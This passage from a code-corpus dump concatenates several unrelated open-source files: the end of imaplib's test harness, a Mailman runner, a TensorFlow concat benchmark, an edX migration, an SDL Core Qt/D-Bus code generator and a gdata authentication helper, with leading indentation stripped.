representing local time (as returned by time.localtime()), or a
double-quoted string. In the last case, it is assumed to already
be in the correct format.
"""
if isinstance(date_time, (int, float)):
tt = time.localtime(date_time)
elif isinstance(date_time, (tuple, time.struct_time)):
tt = date_time
elif isinstance(date_time, str) and (date_time[0],date_time[-1]) == ('"','"'):
return date_time # Assume in correct format
else:
raise ValueError("date_time not of a known type")
dt = time.strftime("%d-%b-%Y %H:%M:%S", tt)
if dt[0] == '0':
dt = ' ' + dt[1:]
if time.daylight and tt[-1]:
zone = -time.altzone
else:
zone = -time.timezone
return '"' + dt + " %+03d%02d" % divmod(zone//60, 60) + '"'
if __name__ == '__main__':
# To test: invoke either as 'python imaplib.py [IMAP4_server_hostname]'
# or 'python imaplib.py -s "rsh IMAP4_server_hostname exec /etc/rimapd"'
# to test the IMAP4_stream class
import getopt, getpass
try:
optlist, args = getopt.getopt(sys.argv[1:], 'd:s:')
except getopt.error as val:
optlist, args = (), ()
stream_command = None
for opt,val in optlist:
if opt == '-d':
Debug = int(val)
elif opt == '-s':
stream_command = val
if not args: args = (stream_command,)
if not args: args = ('',)
host = args[0]
USER = getpass.getuser()
PASSWD = getpass.getpass("IMAP password for %s on %s: " % (USER, host or "localhost"))
test_mesg = 'From: %(user)s@localhost%(lf)sSubject: IMAP4 test%(lf)s%(lf)sdata...%(lf)s' % {'user':USER, 'lf':'\n'}
test_seq1 = (
('login', (USER, PASSWD)),
('create', ('/tmp/xxx 1',)),
('rename', ('/tmp/xxx 1', '/tmp/yyy')),
('CREATE', ('/tmp/yyz 2',)),
('append', ('/tmp/yyz 2', None, None, test_mesg)),
('list', ('/tmp', 'yy*')),
('select', ('/tmp/yyz 2',)),
('search', (None, 'SUBJECT', 'test')),
('fetch', ('1', '(FLAGS INTERNALDATE RFC822)')),
('store', ('1', 'FLAGS', '(\Deleted)')),
('namespace', ()),
('expunge', ()),
('recent', ()),
('close', ()),
)
test_seq2 = (
('select', ()),
('response',('UIDVALIDITY',)),
('uid', ('SEARCH', 'ALL')),
('response', ('EXISTS',)),
('append', (None, None, None, test_mesg)),
('recent', ()),
('logout', ()),
)
def run(cmd, args):
M._mesg('%s %s' % (cmd, args))
typ, dat = getattr(M, cmd)(*args)
M._mesg('%s => %s %s' % (cmd, typ, dat))
if typ == 'NO': raise dat[0]
return dat
try:
if stream_command:
M = IMAP4_stream(stream_command)
else:
M = IMAP4(host)
if M.state == 'AUTH':
test_seq1 = test_seq1[1:] # Login not needed
M._mesg('PROTOCOL_VERSION = %s' % M.PROTOCOL_VERSION)
M._mesg('CAPABILITIES = %r' % (M.capabilities,))
for cmd,args in test_seq1:
run(cmd, args)
for ml in run('list', ('/tmp/', 'yy%')):
mo = re.match(r'.*"([^"]+)"$', ml)
if mo: path = mo.group(1)
else: path = ml.split()[-1]
run('delete', (path,))
for cmd,args in test_seq2:
dat = run(cmd, args)
if (cmd,args) != ('uid', ('SEARCH', 'ALL')):
continue
uid = dat[-1].split()
if not uid: continue
run('uid', ('FETCH', '%s' % uid[-1],
'(FLAGS INTERNALDATE RFC822.SIZE RFC822.HEADER RFC822.TEXT)'))
print('\nAll tests OK.')
except:
print('\nTests failed.')
if not Debug:
print('''
If you would like to see debugging output,
try: %s -d5
''' % sys.argv[0])
raise
| apache-2.0 |
terencehonles/mailman | src/mailman/runners/virgin.py | 3 | 1471 | # Copyright (C) 1998-2012 by the Free Software Foundation, Inc.
#
# This file is part of GNU Mailman.
#
# GNU Mailman is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# GNU Mailman is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# GNU Mailman. If not, see <http://www.gnu.org/licenses/>.
"""Virgin runner.
This runner handles messages that the Mailman system gives virgin birth to.
E.g. acknowledgment responses to user posts or replybot messages. They need
to go through some minimal processing before they can be sent out to the
recipient.
"""
from mailman.core.pipelines import process
from mailman.core.runner import Runner
class VirginRunner(Runner):
def _dispose(self, mlist, msg, msgdata):
# We need to fast track this message through any pipeline handlers
# that touch it, e.g. especially cook-headers.
msgdata['_fasttrack'] = True
# Use the 'virgin' pipeline.
process(mlist, msg, msgdata, 'virgin')
# Do not keep this message queued.
return False
| gpl-3.0 |
calebfoss/tensorflow | tensorflow/python/ops/concat_benchmark.py | 178 | 5247 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Benchmark for split and grad of split."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import random
import time
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session as session_lib
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
def build_graph(device, input_shape, variable, num_inputs, axis, grad):
"""Build a graph containing a sequence of concat operations.
Args:
device: string, the device to run on.
input_shape: shape of the input tensors.
variable: whether or not to randomize the input shape
num_inputs: the number of inputs to concat
axis: axis to be concat'ed
grad: if True compute the gradient
Returns:
An array of tensors to run()
"""
with ops.device("/%s:0" % device):
if not variable:
inputs = [array_ops.zeros(input_shape) for _ in range(num_inputs)]
else:
if axis == 1:
inputs = [
array_ops.zeros([
input_shape[0],
random.randint(max(1, input_shape[1] - 5), input_shape[1] + 5)
]) for _ in range(num_inputs)
]
else:
inputs = [
array_ops.zeros([
random.randint(max(1, input_shape[0] - 5), input_shape[0] + 5),
input_shape[1]
]) for _ in range(num_inputs)
]
outputs = [array_ops.concat(inputs, axis) for _ in range(100)]
if grad:
return control_flow_ops.group(*list(
itertools.chain.from_iterable([
gradients_impl.gradients(output, inputs) for output in outputs
])))
else:
return control_flow_ops.group(*outputs)
class ConcatBenchmark(test.Benchmark):
"""Benchmark concat."""
def _run_graph(self, device, input_shape, variable, num_inputs, axis, grad,
num_iters):
"""Run the graph and print its execution time.
Args:
device: string, the device to run on.
input_shape: shape of the input tensors.
variable: whether or not the input shape should be fixed
num_inputs: the number of inputs to concat
axis: axis to be concat'ed
grad: if True compute the gradient
num_iters: number of steps to run.
Returns:
The duration of the run in seconds.
"""
graph = ops.Graph()
with graph.as_default():
outputs = build_graph(device, input_shape, variable, num_inputs, axis,
grad)
config = config_pb2.ConfigProto(graph_options=config_pb2.GraphOptions(
optimizer_options=config_pb2.OptimizerOptions(
opt_level=config_pb2.OptimizerOptions.L0)))
with session_lib.Session(graph=graph, config=config) as session:
variables.global_variables_initializer().run()
_ = session.run(outputs) # warm up.
start_time = time.time()
for _ in range(num_iters):
_ = session.run(outputs)
duration = time.time() - start_time
print("%s shape:%d/%d var: %r #inputs:%d axis:%d grad:%r - %f secs - %f "
"GB/sec" % (device, input_shape[0], input_shape[1], variable,
num_inputs, axis, grad, duration / num_iters,
num_inputs * input_shape[0] * input_shape[1] * 4 * 2 *
100 / (duration / num_iters) / 1e9))
name_template = (
"concat_bench_{device}_input_shape_{shape}_variable_{variable}"
"_num_inputs_{num_inputs}_axis_{axis}_grad_{grad}")
self.report_benchmark(name=name_template.format(
device=device,
num_inputs=num_inputs,
variable=variable,
grad=grad,
shape=str(input_shape).replace(" ", ""),
axis=str(axis),
iters=num_iters))
return duration
def benchmark_concat(self):
print("Forward vs backward concat")
shapes = [[2000, 8], [8, 2000], [100, 18], [1000, 18], [100, 97],
[1000, 97], [10000, 1], [1, 10000]]
axis_ = [0, 1]
num_inputs = 20
num_iters = [10] * len(shapes)
variable = [False, True] # fixed input size or not
for shape, iters in zip(shapes, num_iters):
for axis in axis_:
for v in variable:
self._run_graph("cpu", shape, v, num_inputs, axis, True, iters)
if __name__ == "__main__":
test.main()
| apache-2.0 |
philanthropy-u/edx-platform | lms/djangoapps/certificates/migrations/0011_certificatetemplate_alter_unique.py | 17 | 2345 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import logging
from django.db import migrations, models
from opaque_keys.edx.django.models import CourseKeyField
from opaque_keys.edx.keys import CourseKey
log = logging.getLogger(__name__)
def revert_alter_unique(apps, schema_editor):
CertificateTemplateModel = apps.get_model("certificates", "CertificateTemplate")
all_unique_templates_ignoring_language = CertificateTemplateModel.objects.values_list(
"organization_id",
"course_key",
"mode").distinct()
for org_id, course_key, mode in all_unique_templates_ignoring_language:
key = CourseKey.from_string(course_key) if course_key else CourseKeyField.Empty
templates = CertificateTemplateModel.objects.filter(organization_id=org_id, course_key=key, mode=mode)
if templates.count() > 1:
# remove all templates past the first (null or default languages are ordered first)
language_specific_templates = templates.order_by('language')[1:]
language_specific_template_ids = language_specific_templates.values_list('id', flat=True)
for template in language_specific_templates:
log.info('Deleting template ' + str(template.id) + ' with details {' +
" name: "+ str(template.name) +
" description: "+ str(template.description) +
" template: "+ str(template.template) +
" organization_id: "+ str(template.organization_id) +
" course_key: "+ str(template.course_key) +
" mode: "+ str(template.mode) +
" is_active: "+ str(template.is_active) +
" language: "+ str(template.language) + " }"
)
CertificateTemplateModel.objects.filter(id__in=list(language_specific_template_ids)).delete()
class Migration(migrations.Migration):
dependencies = [
('certificates', '0010_certificatetemplate_language'),
]
operations = [
migrations.AlterUniqueTogether(
name='certificatetemplate',
unique_together=set([('organization_id', 'course_key', 'mode', 'language')]),
),
migrations.RunPython(migrations.RunPython.noop, reverse_code=revert_alter_unique)
]
| agpl-3.0 |
AByzhynar/sdl_core | src/components/dbus/codegen/make_notifications_qml.py | 13 | 18086 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# @file make_qml_dbus_cpp.py
# @brief Generator of QML to QDbus C++ part
#
# This file is a part of HMI D-Bus layer.
#
# Copyright (c) 2014, Ford Motor Company
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the
# distribution.
#
# Neither the name of the Ford Motor Company nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR 'A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from argparse import ArgumentParser
import os.path
from sys import argv
from xml.etree import ElementTree
from copy import copy
from ford_xml_parser import FordXmlParser, ParamDesc
from code_formatter import CodeBlock
class Notifications_qml(FordXmlParser):
#Used for qt signal names, because qt signals cannot begin with a capital letter
def first_letter_to_lower_case(self, s):
if len(s) == 0:
return s
else:
return s[0].lower() + s[1:]
def make_header(self, out):
out.write("class SdlProxy: public Item {\n")
with CodeBlock(out) as out:
out.write("Q_OBJECT\n")
out.write("Q_DISABLE_COPY(SdlProxy)\n")
out.write("public:\n")
out.write("explicit SdlProxy(Item* parent = 0);\n")
out.write("private:\n")
out.write("QDBusInterface *sdlBasicCommunicationInterface;\n")
out.write("signals:\n")
for interface_el in self.el_tree.findall('interface'):
iface_name = interface_el.get('name')
notifications = self.find_notifications_by_provider(interface_el, "sdl")
for notification_el in notifications:
with CodeBlock(out) as out:
out.write("void %s(" % self.first_letter_to_lower_case( notification_el.get("name")) )
param_el_count = 1
list_of_params = notification_el.findall("param")
list_of_params_len = len(list_of_params)
for param_el in list_of_params:
param = self.make_param_desc(param_el, iface_name)
out.write("QVariant %s" % param_el.get("name"))
if param_el_count < list_of_params_len:
out.write(", ")
param_el_count += 1
out.write(");\n")
with CodeBlock(out) as out:
out.write("private slots:\n")
for interface_el in self.el_tree.findall('interface'):
iface_name = interface_el.get('name')
notifications = self.find_notifications_by_provider(interface_el, "sdl")
for notification_el in notifications:
with CodeBlock(out) as out:
out.write("void slot_%s(" % notification_el.get("name"))
param_el_count = 1
list_of_params = notification_el.findall("param")
list_of_params_len = len(list_of_params)
for param_el in list_of_params:
param = self.make_param_desc(param_el, iface_name)
out.write("%s %s" % (self.qt_param_type(param), param_el.get("name")))
if param_el_count < list_of_params_len:
out.write(", ")
param_el_count += 1
out.write(");\n")
out.write("};\n")
def qt_param_type(self, param):
if not param.mandatory:
param_copy = copy(param)
param_copy.mandatory = True
return "OptionalArgument< " + self.qt_param_type(param_copy) + " >"
if param.array:
param_copy = copy(param)
param_copy.array = False
if param.type == 'String':
return "QStringList"
return "QList< " + self.qt_param_type(param_copy) + " >"
if param.type == 'Integer' or param.enum:
return 'int'
elif param.type == 'String':
return 'QString'
elif param.type == 'Boolean':
return 'bool'
elif param.type == 'Float':
return 'double'
elif param.struct:
return "_".join(param.fulltype)
else:
raise RuntimeError('Unknown type: ' + param.type)
def qml_param_type(self, param):
if not param.mandatory:
return "QVariant"
if param.array:
return "QVariant"
if param.type == 'Integer' or param.enum:
return 'int'
elif param.type == 'String':
return 'QString'
elif param.type == 'Boolean':
return 'bool'
elif param.type == 'Float':
return 'double'
elif param.struct:
return "QVariant"
else:
raise RuntimeError('Unknown type: ' + param.type)
def make_source(self, out):
def qml_args(variable_name_needed):
param_el_count = 1
list_of_params = notification_el.findall("param")
list_of_params_len = len(list_of_params)
for param_el in list_of_params:
param = self.make_param_desc(param_el, iface_name)
if variable_name_needed:
out.write("%s %s" % (self.qt_param_type(param), param_el.get("name")))
else:
out.write("%s" % self.qt_param_type(param))
if param_el_count < list_of_params_len:
out.write(", ")
param_el_count += 1
out.write("SdlProxy::SdlProxy(Item *parent): Item(parent) {\n")
for interface_el in self.el_tree.findall('interface'):
iface_name = interface_el.get('name')
notifications = self.find_notifications_by_provider(interface_el, "sdl")
for notification_el in notifications:
notification_name = notification_el.get('name')
with CodeBlock(out) as out:
out.write("QDBusConnection::sessionBus().connect(\n")
with CodeBlock(out) as out:
out.write("\"com.ford.sdl.core\", \"/\", \"com.ford.sdl.core.%s\",\n" % iface_name)
out.write("\"%s\", this, SLOT(slot_%s(" % (notification_name, notification_el.get("name")))
qml_args(variable_name_needed = False)
out.write(")));\n")
out.write("}\n\n")
for interface_el in self.el_tree.findall('interface'):
iface_name = interface_el.get('name')
notifications = self.find_notifications_by_provider(interface_el, "sdl")
for notification_el in notifications:
notific_full_name = interface_el.get("name") + "_" + notification_el.get("name")
out.write("void SdlProxy::slot_%s(" % notification_el.get("name"))
qml_args(variable_name_needed = True)
out.write(") {\n")
with CodeBlock(out) as out:
out.write("LOG4CXX_TRACE(logger_, \"ENTER\");\n\n")
for param_el in notification_el.findall("param"):
param = self.make_param_desc(param_el, iface_name)
tmp_param_name = param.name + "_qvariant"
out.write("QVariant %s;\n" % tmp_param_name)
out.write("%s = ValueToVariant(%s);\n" % (tmp_param_name, param.name))
self.write_param_validation(param, param.name, "\nLOG4CXX_ERROR(logger_, \"%s in %s out of bounds\")" % (param.name, notific_full_name), out)
out.write("\n")
out.write("emit %s(" % self.first_letter_to_lower_case( notification_el.get("name")) )
param_el_count = 1
list_of_params = notification_el.findall("param")
list_of_params_len = len(list_of_params)
for param_el in list_of_params:
param = self.make_param_desc(param_el, iface_name)
out.write("%s" % param.name + "_qvariant")
if param_el_count < list_of_params_len:
out.write(", ")
param_el_count += 1
out.write(");\n")
with CodeBlock(out) as out:
out.write("LOG4CXX_TRACE(logger_, \"EXIT\");\n")
out.write("}\n\n")
def write_param_validation(self, param, param_name, fail_statement, out, level=0):
if not param.mandatory and (param.restricted or param.restrictedArray or (param.struct and any(map(lambda x: x.restricted, self.structs[param.fulltype])))):
out.write("if (%s.presence) {\n" % param_name)
param_copy = copy(param)
param_copy.mandatory = True
with CodeBlock(out) as out:
self.write_param_validation(param_copy, param_name + ".val", fail_statement, out, level+1)
out.write("}\n")
elif param.array:
if param.minSize > 0:
out.write("if ({0}.count() < {1}) {{".format(param_name, param.minSize))
with CodeBlock(out) as out:
out.write("{0};\n".format(fail_statement))
out.write("}\n")
if param.maxSize != None:
out.write("if ({0}.count() > {1}) {{".format(param_name, param.maxSize))
with CodeBlock(out) as out:
out.write("{0};\n".format(fail_statement))
out.write("}\n")
if param.restricted:
out.write('for ({0}::const_iterator it_{2} = {1}.begin(); it_{2} != {1}.end(); ++it_{2}) {{\n'.format(self.qt_param_type(param), param_name, level))
with CodeBlock(out) as out:
param_copy = copy(param)
param_copy.array = False
self.write_param_validation(param_copy, "(*it_{0})".format(level), fail_statement, out, level+1)
out.write("}\n")
elif param.struct:
for p in self.structs[param.fulltype]:
self.write_param_validation(p, "{0}.{1}".format(param_name, p.name), fail_statement, out, level+1)
elif param.type == "Integer" or param.type == "Float":
conditions = []
if (param.minValue != None):
conditions.append("(%s < %s)" % (param_name, param.minValue))
if (param.maxValue != None):
conditions.append("(%s > %s)" % (param_name, param.maxValue))
if conditions:
out.write('if (%s) {' % ' || '.join(conditions))
with CodeBlock(out) as out:
out.write('%s;\n' % fail_statement)
out.write("}\n")
elif param.type == "String":
conditions = []
if (param.minLength > 0):
conditions.append("(%s.size() < %s)" % (param_name, param.minLength))
if (param.maxLength > 0):
conditions.append("(%s.size() > %s)" % (param_name, param.maxLength))
if conditions:
out.write('if (%s) {' % ' || '.join(conditions))
with CodeBlock(out) as out:
out.write('%s;\n' % (fail_statement))
out.write("}\n")
#QVarian name;
#if (ttsName.presence) {
arg_parser = ArgumentParser(description="Generator of classes which Qt to QDbus C++ part")
arg_parser.add_argument('--infile', required=True, help="full name of input file, e.g. applink/src/components/interfaces/QT_HMI_API.xml")
arg_parser.add_argument('--version', required=False, help="Qt version 4.8.5 (default) or 5.1.0")
arg_parser.add_argument('--outdir', required=True, help="path to directory where output files request_to_sdl.h, request_to_sdl.cc will be saved")
args = arg_parser.parse_args()
if args.version == "4.8.5":
prefix_class_item = 'Script'
invoke_type_connection = 'Direct'
elif args.version == "5.1.0":
prefix_class_item = 'JS'
invoke_type_connection = 'BlockingQueued'
else:
prefix_class_item = 'JS'
invoke_type_connection = 'BlockingQueued'
header_name = 'sdl_proxy.h'
source_name = 'sdl_proxy.cc'
in_tree = ElementTree.parse(args.infile)
in_tree_root = in_tree.getroot()
impl = Notifications_qml(in_tree_root, 'com.ford.sdl.hmi')
header_out = open(args.outdir + '/' + header_name, "w")
source_out = open(args.outdir + '/' + source_name, "w")
header_out.write("// Warning! This file is generated by '%s'. Edit at your own risk.\n" % argv[0])
header_out.write("""
/*
Copyright (c) 2014, Ford Motor Company
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following
disclaimer in the documentation and/or other materials provided with the
distribution.
Neither the name of the Ford Motor Company nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR 'A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
*/
""")
header_out.write("#ifndef SRC_COMPONENTS_QT_HMI_QML_PLUGINS_DBUS_ADAPTER_SDL_PROXY_H_\n")
header_out.write("#define SRC_COMPONENTS_QT_HMI_QML_PLUGINS_DBUS_ADAPTER_SDL_PROXY_H_\n\n")
header_out.write("#include \"qml_dbus.h\"\n")
header_out.write("#include \"qt_version.h\"\n\n")
header_out.write("#include <QtCore/QVariant>\n")
header_out.write("#include <QtDBus/QDBusInterface>\n")
header_out.write("#if QT_4\n")
header_out.write("#include <QtDeclarative/QDeclarativeItem>\n")
header_out.write("typedef QDeclarativeItem Item;\n")
header_out.write("#elif QT_5\n")
header_out.write("#include <QtQuick/QQuickItem>\n")
header_out.write("typedef QQuickItem Item;\n")
header_out.write("#endif // QT_VERSION\n")
impl.make_header(header_out)
header_out.write("#endif // SRC_COMPONENTS_QT_HMI_QML_PLUGINS_DBUS_ADAPTER_REQUEST_TO_SDL_H_")
source_out.write("// Warning! This file is generated by '%s'. Edit at your own risk.\n" % argv[0])
source_out.write("""
/*
Copyright (c) 2014, Ford Motor Company
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following
disclaimer in the documentation and/or other materials provided with the
distribution.
Neither the name of the Ford Motor Company nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR 'A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
*/
""")
source_out.write("#include \"sdl_proxy.h\"\n")
source_out.write("#include \"utils/logger.h\"\n")
source_out.write("CREATE_LOGGERPTR_GLOBAL(logger_, \"DBusPlugin\")\n\n")
impl.make_source(source_out)
| bsd-3-clause |
google-code/android-scripting | python/gdata/src/gdata/sample_util.py | 133 | 7858 | #!/usr/bin/env python
#
# Copyright (C) 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Provides utility functions used with command line samples."""
# This module is used for version 2 of the Google Data APIs.
import sys
import getpass
import urllib
import gdata.gauth
__author__ = 'j.s@google.com (Jeff Scudder)'
CLIENT_LOGIN = 1
AUTHSUB = 2
OAUTH = 3
HMAC = 1
RSA = 2
def get_param(name, prompt='', secret=False, ask=True):
# First, check for a command line parameter.
for i in xrange(len(sys.argv)):
if sys.argv[i].startswith('--%s=' % name):
return sys.argv[i].split('=')[1]
elif sys.argv[i] == '--%s' % name:
return sys.argv[i + 1]
if ask:
# If it was not on the command line, ask the user to input the value.
prompt = '%s: ' % prompt
if secret:
return getpass.getpass(prompt)
else:
return raw_input(prompt)
else:
return None
def authorize_client(client, auth_type=None, service=None, source=None,
scopes=None, oauth_type=None, consumer_key=None,
consumer_secret=None):
"""Uses command line arguments, or prompts user for token values."""
if auth_type is None:
auth_type = int(get_param(
'auth_type', 'Please choose the authorization mechanism you want'
' to use.\n'
'1. to use your email address and password (ClientLogin)\n'
'2. to use a web browser to visit an auth web page (AuthSub)\n'
'3. if you have registed to use OAuth\n'))
# Get the scopes for the services we want to access.
if auth_type == AUTHSUB or auth_type == OAUTH:
if scopes is None:
scopes = get_param(
'scopes', 'Enter the URL prefixes (scopes) for the resources you '
'would like to access.\nFor multiple scope URLs, place a comma '
'between each URL.\n'
'Example: http://www.google.com/calendar/feeds/,'
'http://www.google.com/m8/feeds/\n').split(',')
elif isinstance(scopes, (str, unicode)):
scopes = scopes.split(',')
if auth_type == CLIENT_LOGIN:
email = get_param('email', 'Please enter your username')
password = get_param('password', 'Password', True)
if service is None:
service = get_param(
'service', 'What is the name of the service you wish to access?'
'\n(See list:'
' http://code.google.com/apis/gdata/faq.html#clientlogin)')
if source is None:
source = get_param('source', ask=False)
client.client_login(email, password, source=source, service=service)
elif auth_type == AUTHSUB:
auth_sub_token = get_param('auth_sub_token', ask=False)
session_token = get_param('session_token', ask=False)
private_key = None
auth_url = None
single_use_token = None
rsa_private_key = get_param(
'rsa_private_key',
'If you want to use secure mode AuthSub, please provide the\n'
' location of your RSA private key which corresponds to the\n'
' certificate you have uploaded for your domain. If you do not\n'
' have an RSA key, simply press enter')
if rsa_private_key:
try:
private_key_file = open(rsa_private_key, 'rb')
private_key = private_key_file.read()
private_key_file.close()
except IOError:
print 'Unable to read private key from file'
if private_key is not None:
if client.auth_token is None:
if session_token:
client.auth_token = gdata.gauth.SecureAuthSubToken(
session_token, private_key, scopes)
return
elif auth_sub_token:
client.auth_token = gdata.gauth.SecureAuthSubToken(
auth_sub_token, private_key, scopes)
client.upgrade_token()
return
auth_url = gdata.gauth.generate_auth_sub_url(
'http://gauthmachine.appspot.com/authsub', scopes, True)
print 'with a private key, get ready for this URL', auth_url
else:
if client.auth_token is None:
if session_token:
client.auth_token = gdata.gauth.AuthSubToken(session_token, scopes)
return
elif auth_sub_token:
client.auth_token = gdata.gauth.AuthSubToken(auth_sub_token, scopes)
client.upgrade_token()
return
auth_url = gdata.gauth.generate_auth_sub_url(
'http://gauthmachine.appspot.com/authsub', scopes)
print 'Visit the following URL in your browser to authorize this app:'
print str(auth_url)
print 'After agreeing to authorize the app, copy the token value from the'
print ' URL. Example: "www.google.com/?token=ab12" token value is ab12'
token_value = raw_input('Please enter the token value: ')
if private_key is not None:
single_use_token = gdata.gauth.SecureAuthSubToken(
token_value, private_key, scopes)
else:
single_use_token = gdata.gauth.AuthSubToken(token_value, scopes)
client.auth_token = single_use_token
client.upgrade_token()
elif auth_type == OAUTH:
if oauth_type is None:
oauth_type = int(get_param(
'oauth_type', 'Please choose the authorization mechanism you want'
' to use.\n'
'1. use an HMAC signature using your consumer key and secret\n'
'2. use RSA with your private key to sign requests\n'))
consumer_key = get_param(
'consumer_key', 'Please enter your OAuth conumer key '
'which identifies your app')
if oauth_type == HMAC:
consumer_secret = get_param(
'consumer_secret', 'Please enter your OAuth conumer secret '
'which you share with the OAuth provider', True)
# Swap out this code once the client supports requesting an oauth token.
# Get a request token.
request_token = client.get_oauth_token(
scopes, 'http://gauthmachine.appspot.com/oauth', consumer_key,
consumer_secret=consumer_secret)
elif oauth_type == RSA:
rsa_private_key = get_param(
'rsa_private_key',
'Please provide the location of your RSA private key which\n'
' corresponds to the certificate you have uploaded for your domain.')
try:
private_key_file = open(rsa_private_key, 'rb')
private_key = private_key_file.read()
private_key_file.close()
except IOError:
print 'Unable to read private key from file'
request_token = client.get_oauth_token(
scopes, 'http://gauthmachine.appspot.com/oauth', consumer_key,
rsa_private_key=private_key)
else:
print 'Invalid OAuth signature type'
return None
# Authorize the request token in the browser.
print 'Visit the following URL in your browser to authorize this app:'
print str(request_token.generate_authorization_url())
print 'After agreeing to authorize the app, copy URL from the browser\'s'
print ' address bar.'
url = raw_input('Please enter the url: ')
gdata.gauth.authorize_request_token(request_token, url)
# Exchange for an access token.
client.auth_token = client.get_access_token(request_token)
else:
print 'Invalid authorization type.'
return None
def print_options():
"""Displays usage information, available command line params."""
# TODO: fill in the usage description for authorizing the client.
print ''
| apache-2.0 |
vhosouza/invesalius3 | invesalius/data/slice_data.py | 6 | 5990 | #--------------------------------------------------------------------------
# Software: InVesalius - Software de Reconstrucao 3D de Imagens Medicas
